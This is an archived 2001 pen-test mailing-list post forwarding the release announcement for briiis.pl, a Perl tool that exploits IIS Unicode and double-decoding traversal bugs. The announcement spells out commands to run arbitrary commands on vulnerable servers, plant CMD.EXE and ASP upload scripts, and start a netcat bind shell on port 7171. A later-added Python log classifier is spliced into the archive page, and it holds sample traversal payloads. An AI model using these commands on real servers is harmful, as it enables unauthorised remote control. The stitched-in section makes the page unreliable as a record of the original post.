RE: iXsecurity.tool.briiis.3.02

From: Colby Rice (criceat_private)
Date: Wed Jun 13 2001 - 14:18:58 PDT


    It should be noted that Windows 2k (Workstation, Server, etc.) with
    SP2 is exploitable using the '/' decoding vulnerability. (I'm sure this
    was noted at some point.) It should also be noted that my test machines
    have all the latest patches applied from Microsoft. Anyhow... I would
    like to thank the people at iXsecurity (Ian Vitek) for this application,
    as it proved a point to a co-worker for me. :>

    		Cheers
    			CR
    
    -----Original Message-----
    From: ian.vitekat_private [mailto:ian.vitekat_private]
    Sent: Wednesday, June 13, 2001 7:14 AM
    To: pen-testat_private
    Cc: Hackers
    Subject: iXsecurity.tool.briiis.3.02
    
    iXsecurity Security Tool Release
    briiis.pl v3.02
    ================================
    
    Tool Description
    ----------------
    Briiis is a tool for testing web servers for the "/" encoding
    break-out-from-web-root vulnerability from an executable
    directory, e.g. the IIS Unicode and double encoding
    vulnerabilities.
    
    Special features
    ----------------
    * Tests a lot of common executable directories, checking
      whether any of these directories is on the same disk as
      C:\WINNT\SYSTEM32\CMD.EXE. Very easy to add even more
      directories.
    * Caches the found directory
    * SSL support with SSLeay (Unix)
    * Easy to use text file upload
    * Easy to use / encoding option
    * Relative path name program execution
    * Virtual host support
    
    When to use briiis
    ------------------
    Briiis should be used to test the IIS Unicode or the IIS
    superfluous decoding vulnerability. Briiis can also be
    used to check for other "/" Unicode or "/" decoding
    vulnerabilities where the goal is to break out from the
    web root from an executable directory to access CMD.EXE.
    
    How to use briiis
    -----------------
    Test a server for the unicode vulnerability with the
    command:
    briiis.pl -s server
    
    Test the decoding vulnerability:
    briiis.pl -s server -F %255c
    
    Copy CMD.EXE to the web executable directory
    (Used for running commands and uploading files)
    briiis.pl -s server -x
    
    Run commands
    briiis.pl -s server -C "dir /a"
    
    Upload an ASP script to the executable directory
    (Like cmdasp.asp and upload.asp)
    briiis.pl -s server -u upload.asp
    
    Other options
    -------------
    The virtual host option, -H, is used when multiple web
    servers are bound to the same IP and port, for example
    when reverse proxying.
    The standard "-s www.server.dom" sets the "Host:" header to:
    Host: www.server.dom
    If other virtual servers need to be tested, run:
    briiis.pl -s www.server.dom -H www.server2.dom
    
    Briiis creates a cache file named "<program_name>.cache".
    Delete the cache file if you want to run a new test after
    patching the server.
    
    The binary file upload does not work due to lack of
    privileges. If you want to test it:
    * Copy NC.EXE or something to NC.BIN
    * briiis.pl -s server -U NC.BIN -d -l c:\
    * There is now a NC.SCR, debug script, in c:\
    * With cmdasp.asp run
      debug < nc.scr
    * Start NC.BIN with cmdasp.asp
      c:\nc.bin -l -p 7171 -n -v -e cmd.exe
    The binary upload function can only handle small files.
    Use upload.asp or TFTP when uploading larger files.
    
    Background and more information
    -------------------------------
    Unicode vulnerability information:
    http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
    Superfluous Decoding Vulnerability information:
    http://www.microsoft.com/technet/security/bulletin/MS01-026.asp
    
    TODO
    ----
    * Graphical interface (Planned Q4 2002)
    * Basic Authentication (Planned Q3 2001)
    
    --------------------------------------------------
    
    Ian Vitek, mailto:ian.vitekat_private
    
    --------------------------------------------------
    
    iXsecurity (formerly Infosec) is a Swedish and United
    Kingdom based tiger team that has worked with
    computer-related security since 1982 and has done technical
    security audits (pentests) since 1995.
    iXsecurity welcomes all new co-workers in Sweden
    and the United Kingdom.
    
    --------------------------------------------------
    
    
    
    Briiis.pl
    =========
    
    (See attached file: briiis.pl)
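
As an added illustration (not code from the original post or from iXsecurity), the Python below checks request paths for the "/"-encoding break-out that the forwarded announcement describes from the server-log side: it percent-decodes once, folds overlong UTF-8 forms of "/" and "\" (the MS00-078 Unicode class), then applies a second decode (the superfluous decoding behaviour of MS01-026) and reports whether either stage lets ".." climb above the web root. The sample paths are constructed for the example.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample request paths (not from the original post). The first two use
# the encoded separators the announced tool tests for: an overlong UTF-8 '/'
# (%c0%af, MS00-078 class) and a double-encoded '\' (%255c, MS01-026 class).
SAMPLE_PATHS = {
    "clean":      "/images/logo%20small.gif",
    "unicode":    "/scripts/..%c0%af../winnt/system32/cmd.exe",
    "double":     "/scripts/..%255c../winnt/system32/cmd.exe",
    "plain_dots": "/scripts/../docs/index.html",
}

def decode_once(path: str) -> str:
    """Percent-decode once, then fold overlong two-byte UTF-8 forms of ASCII
    (e.g. %c0%af -> '/', %c1%9c -> '\\') the way a lenient decoder would."""
    raw = unquote_to_bytes(path)
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))  # overlong -> ASCII
            i += 2
        else:
            out.append(chr(b))  # plain byte; latin-1 mapping is enough for this check
            i += 1
    return "".join(out)

def escapes_web_root(path: str) -> bool:
    """Walk the decoded path; a '..' that pops above the starting directory is an escape."""
    depth = 0
    for seg in re.split(r"[/\\]", path):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False

def classify(path: str) -> str:
    """Return 'clean', 'traversal', 'unicode-traversal' or 'double-decode-traversal'."""
    once = decode_once(path)
    if escapes_web_root(once):
        overlong = re.search(r"%c[01]%[89ab][0-9a-f]", path, re.IGNORECASE)
        return "unicode-traversal" if overlong else "traversal"
    twice = decode_once(once)  # the superfluous second decode that MS01-026 describes
    if twice != once and escapes_web_root(twice):
        return "double-decode-traversal"
    return "clean"
```

Run `classify()` over the path field of each log line; a result other than "clean" on a server that still answers such requests is the condition the announced tool reports.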
    



    This archive was generated by hypermail 2b30 : Wed Jun 13 2001 - 22:30:49 PDT